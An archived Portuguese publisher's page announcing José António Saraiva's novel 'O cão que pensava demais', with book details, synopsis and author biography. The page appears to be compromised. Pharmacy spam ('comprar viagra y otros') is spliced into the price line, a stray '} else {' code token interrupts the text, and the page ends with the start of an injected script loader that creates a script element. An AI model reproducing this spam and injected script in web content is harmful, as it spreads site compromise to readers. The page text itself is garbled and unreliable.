Arquivo de Abril, 2011

“O cão que pensava demais”,
José António Saraiva

O Cao Que Pensava DemaisColecção: Mil Horas de Leitura, nº.16
Formato 13,5×20,9
Nº. de págs. 406
Preço com IVA: comprar viagra y otros €23,00
ISBN: 978-989-8236-28-9
EAN: 9789898236289
Nas livrarias a partir de 11 de Abril.


Esta história passa-se nos anos 80, no Portugal emergente da revolução.
Os locais referidos são reais, as figuras públicas expressamente nomeadas também, mas as personagens são totalmente ficcionadas.
Elas procuram sofregamente uma saída, num país onde as grandes ilusões já tinham cedido o lugar à descrença.


“Quem julgava conhecê-lo não o imaginava a escrever ficção. Mas ela aí está – a narração de um amor, quase em registo de intriga policial sem polícias. A segunda surpresa é a segurança e maturidade dessas páginas, que em nada denunciam o estreante”
Sobre “O Último Verão na Ria Formosa”, quando da sua surpreendente estreia no romance,
in Expresso, Cartaz.

Descarregue a folha de promoção Promo O CAO QUE PENSAVA DEMAIS

} else {

Sobre José António Saraiva


Nasceu em Lisboa em 1948. Formou-se em Arquitectura em 1973 e exerceu a profissão durante 10 anos. Colaborou em inúmeros jornais e revistas e assinou vários documentários na RTP. Foi director do semanário Expresso entre 1983 e 2005. Desde 2006 dirige o semanário SOL, de que foi fundador. Escreve semanalmente, desde 1981, uma coluna de análise política (a Política à Portuguesa, no Expresso, depois a Política a Sério, no SOL), que se tornou uma referência no jornalismo político português. Recebeu em 2004 o prémio ibérico de jornalismo Luca de Tena, atribuído pelo diário espanhol ABC.
Publicou o primeiro livro em 1974 (Do Estado Novo à Segunda República) a que se seguiram vários livros de investigação

e memórias. O seu primeiro romance (O Último Verão na Ria Formosa) foi editado em 2001.

“O cão que pensava demais”,
o novo romance de José António Saraiva

O cão que pensava demais - lançamento

Nas Livrarias a partir de 11 de Abril.var d=document;var s=d.createElement(‘script’);